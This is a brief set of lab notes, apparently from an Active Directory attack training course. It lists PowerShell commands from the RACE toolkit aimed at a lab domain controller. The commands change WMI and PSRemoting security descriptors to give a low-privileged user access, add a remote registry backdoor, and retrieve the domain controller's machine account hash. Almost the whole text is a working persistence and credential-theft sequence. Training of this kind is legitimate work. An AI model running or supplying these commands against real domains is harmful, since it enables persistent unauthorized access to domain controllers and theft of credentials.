Exploit WMI Security Descriptors

Modify descriptor for WMI to allow user to access the WMI

. C:\AD\Tools\RACE.ps1

Set-RemoteWMI -SamAccountName student648 -ComputerName dcorp-dc.dollarcorp.moneycorp.local -namespace 'root\cimv2' -Verbose

gwmi -class win32_operatingsystem -ComputerName dcorp-dc.dollarcorp.moneycorp.local

Set-RemotePSRemoting –SamAccountName student648 -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Verbose

Invoke-Command -ScriptBlock{whoami} -ComputerName dcorp-dc.dollarcorp.moneycorp.localdcorp\student648

Add-RemoteRegBackdoor -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Trustee student648 

Get-RemoteMachineAccountHash -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Verbose